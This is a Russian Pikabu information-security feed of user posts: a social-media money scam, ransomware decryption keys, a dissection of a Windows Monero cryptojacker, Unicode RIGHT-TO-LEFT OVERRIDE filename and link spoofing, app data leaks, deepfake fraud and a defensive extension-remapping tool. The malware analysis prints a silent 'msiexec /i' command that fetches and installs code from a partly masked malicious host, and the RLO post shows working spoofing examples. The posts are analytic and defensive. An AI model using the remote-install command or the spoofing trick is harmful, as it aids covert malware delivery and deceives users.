Сообщество - Информационная безопасность
Информационная безопасность
839 постов 18 140 подписчиков
71

Когда быть хакером - не твоё...

Всем привет! Хочу рассказать небольшую историю про то, как мою знакомую девушку взломали. "Хакер", именно в кавычках, начал писать всем её друзьям и, как обычно это бывает, просить прислать на его\её телефон деньги.


Как оказалось, я был вторым, у кого "хакер" попросил(а) скинуть деньги. Ну, а затем читай по скринам.

Когда быть хакером - не твоё... Взлом, Обман, Вконтакте, Переписка, Смешное, Кулстори, Развод, Длиннопост
Когда быть хакером - не твоё... Взлом, Обман, Вконтакте, Переписка, Смешное, Кулстори, Развод, Длиннопост

Ровно через полторы минуты после этого, "хакер" вышел с аккаунта. Вроде бы, обычная ситуация в наше время. Но реакция доставила, больно странно он отреагировал. Поэтому и решил поделиться :)


Всем добра и сложных паролей в аккаунты :)

Показать полностью 2
234

Малварь Muhstik взломали. Ключи дешифрования уже опубликованы.

https://xakep.ru/2019/10/08/muhstik/

..........

При этом Фремель не ограничился и простой публикацией ключей. Он также выпустил инструмент для дешифровки пострадавшей информации, доступный для скачивания через MEGA. Подробную инструкцию по его использованию можно найти на форуме Bleeping Computer.


https://www.bleepingcomputer.com/forums/t/705604/muhstik-qna...


https://mega.nz/#!O9Jg3QYZ!5Gj8VrBXl4ebp_MaPDPE7JpzqdUaeUa5m...

43

Смартфон стал лишку самостоятельным.

Сегодня утром случайно заметил в списке исходящих вызовов неизвестный мне номер совершенный в 4 утра. Надо ли говорить, что в это время я спал.

Простой гуглинг показал, что это телефон некой веб-студии Этика в Уфе.

Особенно удивил добавочный.

Подозреваю, что вызов осуществлён каким-то приложением, хотя Касперский молчит.

В проге, которая у меня записывает все вызовы просто четыре секунды тишины.

Начал вручную набирать этот номер и увидел, что это оказывается не первый случай.

В "ручном" режиме на том конце только автоответчик, оба добавочных им не распознаются.


Кто сталкивался с подобным?

ПС. Особо не переживаю, но так ведь смартфон может и в штаб Навального позвонить, а у меня семья, дети :)

Смартфон стал лишку самостоятельным. Без рейтинга, Смартфон, Скайнет, Неведомая хрень, Длиннопост
Смартфон стал лишку самостоятельным. Без рейтинга, Смартфон, Скайнет, Неведомая хрень, Длиннопост
Показать полностью 2
5834

RIGHT-TO-LEFT OVERRIDE и почему он опасен

В мобильном приложении пост отображается некорректно


Для начала вот вам безобидный пример его использования


Half Life 3 слили на торренты

https://youtu.be/dQw4w9WgXcQ#tnerrot/gro.yabetaripeht


Вот уже не настолько безобидный пример

RIGHT-TO-LEFT OVERRIDE и почему он опасен Безопасность, Unicode, Rlo, Длиннопост

Одна из этих картинок на самом деле не картинка, а исполняемый файл

Методом внимательного (очень-очень внимательного) вглядывания вы сможете найти что тут не так, но в 99% случаев вы не заметите подвоха


Как это работает


RIGHT-TO-LEFT OVERRIDE - это управляющий символ Unicode который указывает что все следующие за ним символы должны отображается справа налево (как арабский текст)

Нужна эта вещь как раз для того чтобы выводить арабский (и т.д.) текст

Так как это управляющий символ сам по себе он не отображается


Но то что текст выводится в обратном порядке означает что программы будут анализировать текст не в таком порядке в каком его видим мы

Вот где то так мы можем видеть текст

87654321

А так его будет воспринимать система

*12345678 ( * - это тот самый символ RIGHT-TO-LEFT OVERRIDE )


Таким образом ссылка вида

https://youtu.be/dQw4w9WgXcQ#tnerrot/gro.yabetaripeht

видна системе как *https://youtu.be/dQw4w9WgXcQ#tnerrot/gro.yabetaripeht (что абсолютно нормально воспринимается пикабу как ссылка на ютуб)


Также можно сделать и посреди имени файла превратив asdhkjbnasgnp.exe

в asdhkjbnas‮gnp.exe

но опять же система воспринимает его как asdhkjbnas*gnp.exe

и хоть мы видим что расширение png на самом деле система запустит его как exe файл


Таким образом вы можете случайно перейти не на тот сайт или открыть вместо картинки\документа\и т.д. exe или любой другой файл

Из моего опыта могу сказать что все вышеперечисленное работает на:

Windows любой версии (по крайней мере начиная с 7й так точно)

Большинстве браузеров (работает вариант со ссылкой, если попытаетесь скачать исполняемый файл браузер вас предупредит что это опасно)

Но не работает в архиваторах (там вместо управляющего символа выводиться прямоугольник, и направление текста не изменяется, хотя я очевидно не во всех архиваторах тестил)


Мораль сего поста такова:

Внимательно смотрите на каком сайте вы вводите пароли и есть ли шифрование

Внимательно смотрите какие файлы вы открываете на компьютере

@moderator @admin надеюсь на этот раз вы это увидите и все таки запретите использовать этот символ на пикабу

Показать полностью
6312

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство "мастеров", думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker'ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ - открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В автозагрузке, повторюсь всё в порядке:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов - ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует "Планировщик заданий" (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Дальше я стал копать и выяснил, что бирюзовое окно - это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива - всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это - файл инсталлятора чего-либо:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, как оказалось, программа никаких файлов в себе не содержала - только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal'е, и получил следующий результат:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология
Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз - да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом - если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково - обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется "Info-Zip UnZip", и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик - что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает - распаковываются файлы только оригинальным UnZip'ом при помощи этой команды.
Все файлы внутри архива - исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Этот файл представляет собой json - конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету "Monero". Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера "****Rig":

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую "работу", и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом - никаких окон).

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

Показать полностью 17
4965

Б - безопасность. Google.

Нужно мне было не так давно получить доступ к информации моей конторы на гугл-картах. Подтвердить свои полномочия можно через код который приходит по обычной почте - письмом. Сегодня оно пришло.

Б - безопасность. Google. Google, Бизнес, Безопасность, Письмо, Длиннопост

Вроде всё серьёзно. Видно - внутри слой для того, что бы нельзя было увидеть содержимое.

Открываем:

Б - безопасность. Google. Google, Бизнес, Безопасность, Письмо, Длиннопост

Да. Есть рифлёный рисунок. А так же предупреждение, пометил красным.

Правда, есть одно но. Напечатано как-то совсем просто.

Б - безопасность. Google. Google, Бизнес, Безопасность, Письмо, Длиннопост

При увеличении видно шум - дешевый принтер. Качество печати оставляет лучшего. Нехорошие мысли полезли дальше.

Ииииии тадааааам:

Б - безопасность. Google. Google, Бизнес, Безопасность, Письмо, Длиннопост
Б - безопасность. Google. Google, Бизнес, Безопасность, Письмо, Длиннопост

Google Мой бизнес - безопасность на высоте.

На просвет видно не только код, но и сам текст письма. Получатель организация - использовать постороннему элементарно. Спасибо Google!

Показать полностью 4
1986

Как данные карт утекают из-за аналитики.

После недавнего шума по поводу сбора данных приложением Burger King я иногда стал проверять траффик приложений на моем телефоне под управлением iOS. Сегодня наткнулся на статью РБК о том, какие небезопасные приложения по заказу еды https://www.rbc.ru/technology_and_media/26/07/2018/5b58822d9... .

Решил посмотреть, что же шлет самое небезопасное приложение по версии Ростелеком-Solar. Оказалось все проще, они никак не шифруют траффик приложения. Т.е. любой маршрутизатор может без труда поймать email и пароль при регистрации приложения. Хотя стандартная регистрация у них "отключена" (так ответили на мое письмо), только с использованием Facebook я смог создать аккаунт. Притом, отключение достаточно странное, с сервера приходит ошибка

{"phone": "Ensure this field has no more than 12 characters.", "visible": false } которая в приложении отображается просто "Что-то пошло не так". Вот что им ушло по незашифрованному каналу.

Как данные карт утекают из-за аналитики. Безопасность, Аналитика, Mitm, Анализ, IOS, Банковская карта, Длиннопост

Никаких серьезных функций я в приложении не обнаружил, например, оплата картой, и решил на этом закончить. Намного интересней смотреть есть ли уязвимости в приложениях, где есть оплата картой. В одном из таких я нашел отправку аналитику буквально о всех действиях юзера. Я не буду писать название приложения, надеюсь их представители мне ответят и/или примут меры.

На каждое нажатие данное приложение отправляет аналитику сервису https://securedtouch.com/. Зайдя на форму ввода карты и введя определенную последовательность я получил набор нажатий достаточный для примерного определения всех введенных данных карты.

Что я ввел ниже:

Как данные карт утекают из-за аналитики. Безопасность, Аналитика, Mitm, Анализ, IOS, Банковская карта, Длиннопост

Собрав данные о нажатиях со всех запросов ушедших на сервер аналитики (в формате json), я написал простое приложение для iOS для визуализации полученных данных. Для наглядности поместил туда скриншот цифровой клавиатуры. Все нажатия оказались в записанных данных.

Как данные карт утекают из-за аналитики. Безопасность, Аналитика, Mitm, Анализ, IOS, Банковская карта, Длиннопост

Цифры это номера нажатий. Я вводил 1234... 16 цифр. Затем при вводе срока действия карты появляется барабан и на нем скролом выбирается месяц (слева) и год (справа)

Как данные карт утекают из-за аналитики. Безопасность, Аналитика, Mitm, Анализ, IOS, Банковская карта, Длиннопост

Т.е. барабан я прокрутил вверх выбрав 9 месяц и 20 год.

Ну и последнее это CVC

Как данные карт утекают из-за аналитики. Безопасность, Аналитика, Mitm, Анализ, IOS, Банковская карта, Длиннопост

Здесь все нажатия с самого начала, я не углублялся чтобы отфильтровать лишнее, главная задача показать что эти данные пишутся. Нажатия 42, 43, 44 как раз введенные CVC.


Комментируя пост про Burger King я высказывал мнение, что именно факт записи видео сильно возмутил людей, хотя записав все что делал юзер можно почти такое же видео получить. Достаточно поместить все действия юзера на изображения форм приложения.


Использовать аналитику, которая пишет все и вся, нужно быть предельно внимательным к таким критическим частям приложения, где вводятся данные платежных карт или персональная информация.


Для анализа трафика я использовал https://mitmproxy.org/.

Показать полностью 4
2487

Нашлось все: отчеты международных и российских компаний, отчеты по премиям и даже план удаленных документов Минэкономразвития.

Нашлось всё!


Доступ: доступно всему интернету.

Нашлось все: отчеты международных и российских компаний, отчеты по премиям и даже план удаленных документов Минэкономразвития. Поисковик, Яндекс, Информация, Слив, Скандал, Facebook, Цукерберг, Ашан, Длиннопост
Нашлось все: отчеты международных и российских компаний, отчеты по премиям и даже план удаленных документов Минэкономразвития. Поисковик, Яндекс, Информация, Слив, Скандал, Facebook, Цукерберг, Ашан, Длиннопост
Нашлось все: отчеты международных и российских компаний, отчеты по премиям и даже план удаленных документов Минэкономразвития. Поисковик, Яндекс, Информация, Слив, Скандал, Facebook, Цукерберг, Ашан, Длиннопост
Показать полностью 1
6369

Опубликована уязвимость у всех российских сотовых операторов, позволяющая узнать номер, IMEI и местоположение абонента.

Источник - ЯПлакалЪ


Известный ресурс для айтишников в рунете - хабрахабр уже начал гудеть от опубликованной там сегодня в обед статьи "DPI мобильных операторов: от бесплатного интернета до раскрытия номера и местоположения".

Так как ресурс, что называется, "не для всех" и информация, изложенная в той статье, наверняка прошла бы мимо 99% читателей и пользователей сотовой связи, я бы хотел кратко и более доступным языком объяснить какой лютый треш сегодня на самом деле был обнародован!

Гениальный чувак, автор той статьи, сумел разобраться с тем, как сотовые операторы внедряют свои служебные заголовки в открываемые абонентами сотовых операторов страницы различных служебных сайтов сотовых операторов и научился модифицировать эти заголовки таким образом, чтобы при заходе на сайт вообще не принадлежащий сотовому оператору, от абонента на этот сайт отдавались следующие данные:


1) номер телефона абонента, закрепленный за SIM-картой, с которой происходит выход в интернет при заходе на такой злонамеренный сайт.

2) в некоторых случаях IMEI устройства.

3) при некоторых условиях - местоположения абонента по идентификаторам базовой станции, на которой сейчас работает абонент.

4) иные данные.


Кроме того, автор той статьи научился таким образом модифицировать заголовки своих запросов, что есть возможность попадать в личные кабинеты чужих номеров и работать в чужих Личных кабинентах с чужими номерами как со своими, а также получать бесплатный доступ в интернет при нулевом или отрицательном балансе.

Особо подчеркну, что никакие соксы и прокси, vpn, ssh и т.д. и т.п. пока на данный момент не помогут защититься от раскрытия указанных данных!

На самом хабрахабре уже опубликована ссылка на тестовый сайт, при заходе на который любой абонент МТС тут же увидит свой номер и получит входящий звонок. Можете попробовать сами!

Прошу оценить ситуацию: простой заход на тестовый сайт, не имеющий никакого отношения к доменам сотовых операторов и Вы деанонимизированы.

Как пишет автор статьи, дыра лишь частично закрыта сотовыми операторами с 2016 года, но большая часть уязвимостей не закрыта по текущий день.

Даже страшно себе представить, какой простор для мошеннических схем сейчас будет открыт...

Хабрахабр

2280

Таблица: «Хабрахабр» первым из российских компаний раскрыл статистику запросов властей о пользователях

Роскомнадзор, ФСБ и СК за пять лет предъявляли требования почти 40 раз.

Таблица запросов:

Таблица: «Хабрахабр» первым из российских компаний раскрыл статистику запросов властей о пользователях Таблица, Habr, Статистика, Запросы, МВД, ФСБ, Роскомнадзор, Длиннопост
Таблица: «Хабрахабр» первым из российских компаний раскрыл статистику запросов властей о пользователях Таблица, Habr, Статистика, Запросы, МВД, ФСБ, Роскомнадзор, Длиннопост
Таблица: «Хабрахабр» первым из российских компаний раскрыл статистику запросов властей о пользователях Таблица, Habr, Статистика, Запросы, МВД, ФСБ, Роскомнадзор, Длиннопост
Таблица: «Хабрахабр» первым из российских компаний раскрыл статистику запросов властей о пользователях Таблица, Habr, Статистика, Запросы, МВД, ФСБ, Роскомнадзор, Длиннопост
Таблица: «Хабрахабр» первым из российских компаний раскрыл статистику запросов властей о пользователях Таблица, Habr, Статистика, Запросы, МВД, ФСБ, Роскомнадзор, Длиннопост

В 2014 году запросов от органов к Хабру не поступало.

Статистика:

Удовлетворено 30 запросов.

Из них обжаловано 2 запроса.

Отклонено 9 запросов.

«Хабрахабр» раскрыл статистику запросов на фоне серии судебных процессов против пользователей соцсетей (чаще всего, «ВКонтакте»), которым вменяют экстремизм или оскорбление чувств верующих.

https://habr.com/company/tm/blog/422967/

https://tjournal.ru/76841-habrahabr-pervym-iz-rossiyskih-kom...

Показать полностью 2
2407

Воры используют deepfakes для обмана компаний, заставляя посылать себе деньги

Воры используют deepfakes для обмана компаний, заставляя посылать себе деньги Информационная безопасность, Машинное обучение, Искусственный интеллект, Длиннопост, Deepfake, Habr

C момента своего появления в декабре 2017-го дипфейки, видео с почти идеальной заменой лица, созданные нейросетью, наводили на экспертов панику. Многие, например, тогда боялись, что теперь еще проще станет «порно-месть», когда бывший бойфренд с достаточно мощным ПК может смастерить любое грязное порно с подругой. А Натали Портман и Скарлетт Йоханссон, о которых порно с deepfake снимали особенно много, публично прокляли интернет.


Чтобы бороться с подступающей угрозой, Facebook и Microsoft недавно собрали коалицию для борьбы с дипфейками, объявив призовой фонд $10 млн тем разработчикам, которые придумают лучшие алгоритмы для их обнаружения. Это помимо DARPA, управления исследованиями Министерства обороны США, выделившего на эту цель $68 млн за последние два года.


Ну так вот, уже поздно. Первое deepfake-преступление уже состоялось.

Воры используют deepfakes для обмана компаний, заставляя посылать себе деньги Информационная безопасность, Машинное обучение, Искусственный интеллект, Длиннопост, Deepfake, Habr

По данным Wall Street Journal, в марте этого года управляющий директор британской энергетической компании был ограблен на €220 000 (около $240 000). Он отправил эти деньги фирме-поставщику из Венгрии, потому что его босс, глава материнской фирмы в Германии, несколько раз подтвердил ему такую инструкцию. Но на самом деле какой-то хитрый злоумышленник просто использовал софт с AI-технологиями, чтобы в режиме реального времени заменять голос руководителя, и требовать, чтобы тот заплатил ему в течение часа.


Программа, которую использовал вор, смогла полностью имитировать голос человека: тон, пунктуацию, даже немецкий акцент. Сообщение исходило с адреса босса в Германии, в подтверждение британскому директору был направлен e-mail с контактами. Предположить, что что-то идёт не так, можно было разве что по требованию босса провести всю сделку как можно быстрее, но это далеко не первый аврал, который случался в их бизнесе.


В итоге – все деньги пропали. Из венгерского аккаунта их перевели в Мексику, а потом рассеяли по всему миру. Но воры на этом не остановились. Они попросили второй срочный перевод, чтобы «поставки из Венгрии» «пошли еще быстрее». Тут уж британский директор почуял неладное, и позвонил своему настоящему боссу. Получился какой-то сюр: он по очереди принимал звонки то от фейкового, то от настоящего руководителя, говорящих одинаковыми голосами. Название компании и её сотрудников не разглашаются, поскольку по этому делу ведется расследование, и воры еще не найдены.

Воры используют deepfakes для обмана компаний, заставляя посылать себе деньги Информационная безопасность, Машинное обучение, Искусственный интеллект, Длиннопост, Deepfake, Habr

Возможно, это даже не первая кража с использованием Deepfake AI (или его продвинутых последователей). Symantec сообщает, что она засекла как минимум три случая, в которых замена голоса помогла ворам обхитрить компании и заставить их послать им деньги. В одном из этих случаев ущерб составил миллионы долларов. Причем, судя по косвенным признакам, этот трюк был проделан другими злоумышленниками – не теми, которые обокрали британского СЕО. То есть, deepfake-преступления постепенно становятся общим достоянием, это не придумка какого-то одного гениального хакера.


На самом деле, скоро такую процедуру сможет проделать любой школьник. Главное – найти достаточно доверчивую жертву, и собрать нужное количество сэмплов видео/аудио, чтобы имперсонировать, кого потребуется. Google Duplex уже успешно мимикрирует под голос реального человека, чтобы делать звонки от его имени. Многие небольшие стартапы, в основном из Китая, работают над тем, чтобы предлагать похожие на deepfake сервисы бесплатно. Разные программы-дипфейки даже соревнуются друг с другом, кто сможет сгенерировать достаточно убедительное видео с человеком, используя минимальный объем данных. Некоторые заявляют, что скоро им будет достаточно одного вашего фото.


В июле Израильское национальное управление защиты от киберугроз выпустило предупреждение о принципиально новом виде кибератак, которые могут быть направлены на руководство компаний, ответственных сотрудников и даже высокопоставленных чиновников. Это первая и на данный момент самая реальная AI-угроза. Они говорят, уже сейчас есть программы, способные идеально передать ваш голос и акцент, прослушав вас 20 минут. Если где-то в сети есть запись с вашей речью в течение получаса, или если кто-то немного посидел рядом с вами в кафе с диктофоном, ваш голос теперь может быть использован, чтобы сказать кому угодно что угодно.


Пока что инструментов для борьбы с этим нет. Вариант защититься только один. Если вам кто-то звонит и просит перевести существенную сумму денег, – не будет лишним подтвердить, что это тот самый человек, по другому каналу. Через мессенджеры, Скайп, e-mail, корпоративные каналы или соцсети. А в идеале, конечно же, – лицом к лицу.


Ну а если у вас есть глубокие познания в машинном обучении и вы не прочь получить кусок от пирога в $10 млн – можно попробовать себя в конкурсе Microsoft и Facebook. Или основать свой стартап, предлагающий государству и солидным компаниям бизнес-решение для определения дипфейков по картинке или по голосу. Без этого нам скоро будет не обойтись.

Источник: Хабр

Показать полностью 1
2600

Winassociate - топорная рекомендация от шифровальщиков

Winassociate - топорная рекомендация от шифровальщиков Вирус, Шифровальщик, Cmd, Программа, Расширение, Assoc, Информационная безопасность, IT, Длиннопост

Хочу довести информацию, что данный топорный метод #comment_82295458 имеет место быть.

Winassociate - топорная рекомендация от шифровальщиков Вирус, Шифровальщик, Cmd, Программа, Расширение, Assoc, Информационная безопасность, IT, Длиннопост

После этого все исполняемые файлы с которыми часто запускаются шифровальщики будут ассоциироваться с текстовым файлов и открываться в блокноте.

Если потребуется вернуть стандартные значения прописываем в командной строке:

assoc .bas=basfile
assoc .js=jsfile
assoc .jse=JSEFile
assoc .CMD=cmdfile
assoc .com=cmdfile
assoc .hta=htafile
assoc .pif=piffile
assoc .GADGET=Windows.gadget
assoc .SCR=scrfile
assoc .VBE=VBEFile
assoc .VB=VBFile
assoc .vbs=VBSFile
assoc .wsf=WSFFile
assoc .wsc=scriptletfile
assoc .wsh=WSHFile
assoc .bat=batfile

Для упрощения данных операций написал следующую простую программу

Аналог есть в интернете Unassociate-File-Types которая - Не запускается в Windows 10


+ добавил расширения исполняемых файлов

Winassociate - топорная рекомендация от шифровальщиков Вирус, Шифровальщик, Cmd, Программа, Расширение, Assoc, Информационная безопасность, IT, Длиннопост

Было желание сделать только для данных расширений, но позже добавил

+ Админ.панель которая показывает и позволяет менять все расширения (ассоциации)

Winassociate - топорная рекомендация от шифровальщиков Вирус, Шифровальщик, Cmd, Программа, Расширение, Assoc, Информационная безопасность, IT, Длиннопост

Файл занимает 225КБ в комплекте .bat файлы для тех кто не собирается запускать программу

default.bat - Вернуть ассоциации по умолчанию
modify.bat - Замена основных исполняемых файлов на текстовый формат
exe.bat - На всякий случай если словили вирус .lnk
show accos - Показать все ассоциации
Winassociate - топорная рекомендация от шифровальщиков Вирус, Шифровальщик, Cmd, Программа, Расширение, Assoc, Информационная безопасность, IT, Длиннопост

Для того чтобы проверить в папке "test" пустые файлы со всеми расширениями в списке

Winassociate - топорная рекомендация от шифровальщиков Вирус, Шифровальщик, Cmd, Программа, Расширение, Assoc, Информационная безопасность, IT, Длиннопост

Программа будет работать только если Запустить от имени администратора

Для желающих напишите на почту отправлю исходники


Советы, рекомендации, пожелания туда же

vsat.info@yandex.ru
Winassociate - топорная рекомендация от шифровальщиков Вирус, Шифровальщик, Cmd, Программа, Расширение, Assoc, Информационная безопасность, IT, Длиннопост

Спасибо тем кто дочитал, надеюсь кому нибудь окажется полезной.

Для тех, кто резко против прошу не топить (коменты для минусов прилагаются)


Яндекс.Диск

Показать полностью 5
3202

В США таможенники заставили программиста пройти тест на знание компьютера.

Сотрудники таможни нью-йоркского аэропорта усомнились в правдивости данных, указанных в выданной инженеру визе.


